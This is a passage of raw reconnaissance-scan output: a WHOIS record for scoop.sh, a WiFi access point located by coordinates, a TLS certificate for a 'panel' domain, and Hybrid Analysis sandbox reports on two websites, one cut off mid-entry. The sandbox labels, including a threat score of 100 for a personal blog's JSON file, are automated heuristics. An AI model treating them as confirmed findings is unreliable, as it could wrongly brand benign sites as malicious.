service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain Name: scoop.sh
Registry Domain ID: UNDEF-ROID
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2023-04-21T08:07:40Z
Creation Date: 2013-06-20T09:02:06Z
Registrar Registration Expiration Date: 2023-06-20T11:02:06Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Name Server: NS-604.AWSDNS-11.NET
Name Server: NS-1776.AWSDNS-30.CO.UK
Name Server: NS-308.AWSDNS-38.COM
Name Server: NS-1530.AWSDNS-63.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL:
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 03:24:29 | Company Name | No | Company Name Extractor | 0 | 0 | 4 | 0 | None | Netlify\, Inc | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Sprint Drive (Net ID: 00:0A:F5:55:59:00) | 39.0469, -77.4903 |
| 2023-05-12 02:44:42 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | panel.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:10:8b:16:97:4c:80:e7:56:d7:06:74:1e:45:16:d2:cf:08
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 13:27:58 2022 GMT
Not After : Mar 18 13:27:57 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ad:62:80:b3:4a:16:3f:d1:ca:02:76:24:cc:9e:
aa:84:81:39:ce:32:30:eb:2b:8e:c4:10:85:04:e9:
19:e1:2c:8b:f7:58:3e:cb:1c:ff:b5:a4:5e:3a:d3:
5f:cd:9f:7e:93:67:29:42:61:bd:af:c4:d3:ff:2c:
ba:88:7a:06:b8:ee:d1:0b:bb:86:7e:44:8f:c8:6e:
9f:15:1a:80:a4:23:08:22:e4:47:13:58:3b:f2:14:
1e:d6:ab:b0:0d:9a:3d:43:fa:19:c7:62:73:68:d3:
e8:e2:e0:f2:f8:19:08:fa:27:87:9f:f6:00:ca:15:
68:32:25:1a:17:ab:c2:10:cf:ee:c4:5c:e1:5a:4c:
7f:24:75:c4:d7:a8:bb:65:e9:41:ed:b3:2d:c0:d3:
43:15:31:0d:92:7c:15:d2:74:91:60:11:b3:a9:c4:
23:1e:bd:9f:cd:65:52:70:48:15:e3:b8:f4:be:c0:
7b:19:6d:7b:06:84:b9:fd:58:0b:97:47:76:a2:75:
8a:02:5c:f4:a0:74:5a:14:c3:00:00:11:33:ca:09:
cb:4f:f9:83:06:46:d2:9c:09:dd:c0:9e:5b:21:5b:
9d:26:54:f2:ef:8a:39:ff:fb:2e:d5:3b:31:32:7d:
8d:f4:d5:b5:c2:47:2c:44:11:4c:77:93:b1:be:73:
3c:fd:f8:ad:ee:38:c8:cc:7c:fd:93:89:87:7c:f1:
ff:7e:d9:02:fc:16:a4:8b:6d:44:ce:9d:18:99:9a:
80:ce:7f:84:4a:5f:f2:64:78:f3:c5:e5:c6:c7:66:
3e:15:14:9a:10:d3:79:7b:53:46:72:6c:1d:43:1a:
b1:35:e5:15:1e:25:f5:a3:42:b9:f7:c3:cc:11:45:
0d:91:92:d0:7c:af:f5:38:d6:f6:5b:a6:85:e8:1b:
87:47:00:ae:a6:0b:b0:8b:45:d2:80:d3:a6:4d:e2:
fe:d5:6d:a5:c3:c6:cb:5d:f4:1c:79:c6:67:7f:4c:
cd:e5:9e:5e:f5:60:0e:99:47:13:b5:ed:4f:e1:0e:
26:01:e6:84:00:6a:80:a9:fd:0c:5d:16:61:ba:be:
ee:5f:41:8c:41:20:95:45:47:52:41:85:d1:cc:b2:
ba:00:26:e3:48:1b:65:5b:e0:7a:f5:04:7c:c4:32:
1f:ac:c5:99:05:ef:49:b1:5a:de:e3:c4:60:e2:03:
33:84:8a:7a:ad:eb:d2:0c:0c:ff:c4:c2:64:33:29:
15:c7:0a:73:e3:0f:ee:4a:08:a2:6b:f1:e4:95:67:
2f:52:99:fd:3e:6c:01:2d:31:33:10:f6:db:5c:20:
7c:3b:ba:79:4b:c3:c0:d7:a8:e3:f0:e3:c9:f6:e5:
3c:bf:e5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A8:1A:0A:B4:5A:C9:CB:04:98:CA:A0:D2:67:45:9B:9C:A4:98:23:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 18 14:27:58.330 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:5D:91:A5:EC:4A:FC:74:A1:CB:A1:43:42:
98:62:F0:F5:48:D8:59:AD:3A:BF:07:84:B7:A0:B8:FB:
F5:7F:02:9D:02:20:12:51:01:88:30:77:0C:12:2D:94:
E1:FC:28:63:C7:64:51:4C:7A:14:F6:58:60:D3:18:55:
AA:0B:5F:BF:83:CC
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 18 14:27:58.947 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:D5:B1:CF:FB:EB:66:58:C1:7C:1F:B7:
27:25:02:E3:9E:12:C4:74:28:D8:27:C6:B7:CB:84:D4:
7D:B7:00:1E:10:02:20:0C:56:3E:2A:0C:E4:D2:75:F2:
E0:99:5F:A7:32:B4:86:4A:7F:09:D3:E9:8B:5E:F2:A9:
78:DC:08:7A:AD:C8:9D
Signature Algorithm: sha256WithRSAEncryption
56:f1:41:e3:6f:ab:da:37:be:d4:6d:55:43:59:14:33:ac:42:
61:99:54:b2:cc:68:3b:12:68:7c:14:63:9a:e3:c7:2d:28:07:
ac:4e:8c:b4:88:4d:80:ce:91:c9:a5:4d:dd:f1:2e:8e:58:cd:
80:0c:46:fa:23:e4:c8:e8:14:61:72:93:e1:44:e8:c3:77:c0:
aa:ee:7c:6f:ea:e8:70:f4:d2:e3:e8:1b:8a:39:ca:f5:73:f4:
96:02:3b:a3:36:c0:cb:29:b2:45:5f:f0:82:fc:84:4a:6e:b5:
8b:1c:4a:0e:46:1e:66:a9:10:39:d1:75:3c:a8:c4:57:7f:9f:
62:b2:b2:a2:ec:e6:f3:84:e9:0c:f9:be:3e:3f:3f:98:a2:49:
b7:f8:ec:62:7a:a6:69:6f:94:d9:c6:a1:e0:cd:b8:20:3a:ae:
44:80:7f:ac:d9:a3:54:24:56:5d:f1:bf:01:6e:fe:df:0c:62:
2d:77:e4:5c:18:4d:90:25:51:13:68:40:ac:f8:0c:fc:86:c6:
34:50:55:8e:da:35:b1:44:f3:0d:df:99:4c:2f:5a:3f:d4:52:
8d:52:80:94:14:ff:5b:30:58:13:05:5b:9a:df:d5:d4:32:40:
69:ff:dd:82:79:46:62:09:c8:ab:58:69:3f:2e:57:89:60:f9:
31:9d:86:6b
|
| 2023-05-12 02:56:57 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/angular/angular.js/pull/2902', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/angular/angular.js/blob/master/src/ng/urlutils.js', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 26, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://pickerwheel.com/', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "netapi32.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:1892:120:WilError_01"\n "Local\\SM0:2444:120:WilError_01"\n "Local\\SM0:2444:304:WilStaging_02"\n "SM0:2444:120:WilError_01"\n "InternetShortcutMutex"\n "ChromeProcessSingletonStartup!"\n "SM0:1892:304:WilStaging_02"\n "Local\\SM0:1892:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_DavidM_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_MarkM_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_ZiraM_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:1892:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:1892:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:1892:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"54.215.114.29:443"\n "13.227.74.39:443"\n "172.64.143.38:443"\n "52.223.40.198:443"\n "13.227.77.47:443"\n "13.227.74.67:443"\n "142.251.2.157:443"\n "13.227.74.85:443"\n "13.227.74.30:443"\n "104.18.34.10:443"\n "104.22.53.86:443"\n "18.235.185.19:443"\n "54.186.215.15:443"\n "184.26.129.51:443"\n "104.18.25.185:443"\n "13.227.78.117:443"\n "74.119.118.151:443"\n "54.67.2.147:443"\n "35.227.252.103:443"\n "172.67.72.66:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"a.teads.tv"\n "a177a0690a0ac8223a5887b6f44f3a4f.safeframe.googlesyndication.com"\n "aax.amazon-adsystem.com"\n "acdn.adnxs.com"\n "acds.prod.vidible.tv"\n "ad.doubleclick.net"\n "ads.adthrive.com"\n "adx.g.doubleclick.net"\n "api.rlcdn.com"\n "ats.rlcdn.com"\n "bidder.criteo.com"\n "btlr.sharethrough.com"\n "c.amazon-adsystem.com"\n "c2shb.pubgw.yahoo.com"\n "c2shb.ssp.yahoo.com"\n "cdn.ampproject.org"\n "cdn.brandmetrics.com"\n "cdn.confiant-integrations.net"\n "cdn.id5-sync.com"\n "cdn.jwplayer.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_2]- [targetUID: 00000000-00001892]\n "2cebbc13-a880-451d-8f90-183cd02c69f7.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 366884"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00001892]\n "000009.log" has type "data"- [targetUID: N/A]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00001892]\n "4adfb1408c1f9cb9_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\4adfb1408c1f9cb9_0]- [targetUID: 00000000-00001892]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00001892]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- [targetUID: N/A]\n "Session_13325706525672020" has type "data"- [targetUID: N/A]\n "508ed6539f911a22_0" has type "data"- [targetUID: N/A]\n "000014.ldb" has type "data"- [targetUID: N/A]\n "de7d83af72dd8e77_0" has type "data"- [targetUID: N/A]\n "f_0004d7" has type "gzip compressed data from Unix original size modulo 2^32 763040"- [targetUID: N/A]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00002444]\n "9b2c1c9dc80fc2b3_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\9b2c1c9dc80fc2b3_0]- [targetUID: 00000000-00001892]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts random domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jwplayer.com" seems to be random\n "direct.adsrvr.org" seems to be random\n "g2.gumgum.com" seems to be random\n "lb.eu-1-id5-sync.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://pickerwheel.com/"\n Pattern match: "https://pickerwheel.com"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://acdn.adnxs.com/video/outstream/ANOutstreamVideo.jsaD`D`\xaeD`Q"\n Pattern match: "https://acdn.adnxs.com/video/outstream/ANOutstreamVideo.jsaD`D`D`Q"\n Pattern match: "http://modern.ie"\n Pattern match: "http://www.patternify.com"\n Pattern match: "http://designer.videojs.com/"\n Pattern match: "http://www.cssplay.co.uk/layouts/fixed.html"\n Pattern match: "https://github.com/videojs/video.js/blob/master/src/css/video-js.less"\n Pattern match: "http://www.w3.org/TR/NOTE-datetime"\n Pattern match: "http://www.pelagodesign.com/blog/2009/05/20/iso-8601-date-validation-that-doesnt-suck/"\n Pattern match: "https://msdn.microsoft.com/en-us/library/ms537509(v=vs.85).aspx"\n Pattern match: "https://github.com/petkaantonov/bluebird/wiki/Optimization-killers#32-leaking-arguments"\n Pattern match: "https://msdn.microsoft.com/en-us/library/cc288060(v=vs.85).aspx"\n Pattern match: "http://bugs.jquery.com/ticket/1450"\n Pattern match: "http://msdn.microsoft.com/en-us/library/ie/cc196988(v=vs.85).aspx"\n Pattern match: "https://github.com/angular/angular.js/blob/master/src/ng/urlUtils.js"\n Pattern match: "http://www.aptana.com/reference/html/api/HTMLAnchorElement.html"\n Pattern match: "http://stackoverflow.com/a/472729"\n Pattern match: "http://developer.mozilla.org/en-US/docs/Web/API/HTMLAnchorElement"\n Pattern match: "http://url.spec.whatwg.org/#urlutils"\n Pattern match: "https://github.com/angular/angular.js/pull/2902"\n Pattern match: "http://james.padolsey.com/javascript/parsing-urls-with-the-dom/"\n Pattern match: "http://www.w3.org/1999/xhtml"\n Pattern match: "https://stash.corp.appnexus.com/projects/VIDEO/repos/resources_video-ad-video-player-html5-plugin-vpaid/pull-requests/14/overview"\n Pattern match: "acdn.adnxs-simple.com/video/static/res/b2.mp4$Sy"\n Pattern match: "acdn.adnxs-simple.com/video/static/res/av2.mp4$a"\n Pattern match: "rb.adnxs-simple.com/pack?log=log_rb_video_waterfall_events&format=json$Sy"\n Pattern match: "rb.adnxs-simple.com/pack?log=log_rb_video_outstream&format=json$Sy"\n Heuristic match: "a.teads.tv"\n Heuristic match: "a177a0690a0ac8223a5887b6f44f3a4f.safeframe.googlesyndication.com"\n Heuristic match: "aax.amazon-adsystem.com"\n Heuristic match: "acdn.adnxs.com"\n Heuristic match: "acds.prod.vidible.tv"\n Heuristic match: "ad.doubleclick.net"\n Heuristic match: "ads.adthrive.com"\n Heuristic match: "adx.g.doubleclick.net"\n Heuristic match: "api.rlcdn.com"\n Heuristic match: "ats.rlcdn.com"\n Heuristic match: "bidder.criteo.com"\n Heuristic match: "btlr.sharethrough.com"\n Heuristic match: "c.amazon-adsystem.com"\n Heuristic match: "c2shb.pubgw.yahoo.com"\n Heuristic match: "c2shb.ssp.yahoo.com"\n Heuristic match: "cdn.ampproject.org"\n Heuristic match: "cdn.brandmetrics.com"\n Heuristic match: "cdn.confiant-integrations.net"\n Heuris | 35.229.48.116 |
| 2023-05-12 02:47:48 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 18, u'threat_score': 100, u'compromised_hosts': [u'185.199.108.153'], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://www.travismathison.com:8080/assets/js/data/search.json', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows"), Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:49731"\n "185.199.108.153:49737"\n "185.199.111.153:49743"\n "185.199.109.153:49752"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2964:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2964:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:7576:304:WilStaging_02"\n "Local\\SM0:7576:120:WilError_01"\n "Local\\SM0:2964:120:WilError_01"\n "Local\\SM0:2964:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3724:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.travismathison.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\2964_441367473\\Part-RU]- [targetUID: 00000000-00002964]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00002964]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00002964]\n "331833fe-aa24-4a32-a4fb-ef3c19aa8c0c.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\331833fe-aa24-4a32-a4fb-ef3c19aa8c0c.tmp]- [targetUID: 00000000-00002288]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00002964]\n "Part-NL" has type "PGP symmetric key encrypted data -"- Location: [%TEMP%\\2964_441367473\\Part-NL]- [targetUID: 00000000-00002964]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\2964_441367473\\Part-RU]- [targetUID: 00000000-00002964]\n "Session_13319115991286099" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Session_13319115991286099]- [targetUID: 00000000-00002964]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00002964]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00002964]\n "widevinecdm.dll.sig" has type "data"- Location: [%TEMP%\\2964_842337331\\_platform_specific\\win_x64\\widevinecdm.dll.sig]- [targetUID: 00000000-00002964]\n "crl-set" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\crl-set]- [targetUID: 00000000-00002964]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.fingerprint]- [targetUID: 00000000-00002964]\n "31695c7e-2be1-4080-af62-904e1deee83c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\31695c7e-2be1-4080-af62-904e1deee83c.tmp]- [targetUID: 00000000-00002964]\n "Part-ZH" has type "data"- Location: [%TEMP%\\2964_441367473\\Part-ZH]- [targetUID: 00000000-00002964]\n "46b20db5-be50-4bf4-b4f6-d1b4b39f1117.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\46b20db5-be50-4bf4-b4f6-d1b4b39f1117.tmp]- [targetUID: 00000000-00002964]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\2964_1124322810\\_metadata\\verified_contents.json]- [targetUID: 00000000-00002964]\n "shopping_fre.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%TEMP%\\2964_812909146\\shopping_fre.html]- [targetUID: 00000000-00002964]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\LOG]- [targetUID: 00000000-00002964]\n "c53b5902-6f05-4039-9ca9-9a0b2029a141.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\c53b5902-6f05-4039-9ca9-9a0b2029a141.tmp]- [targetUID: 00000000-00002964]\n "Variations" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Variations]- [targetUID: 00000000-00002964]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.travismathison.com:8080/assets/js/data/search.json"\n Pattern match: "http://www.travismathison.com"\n Pattern match: "www.travismathison.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': 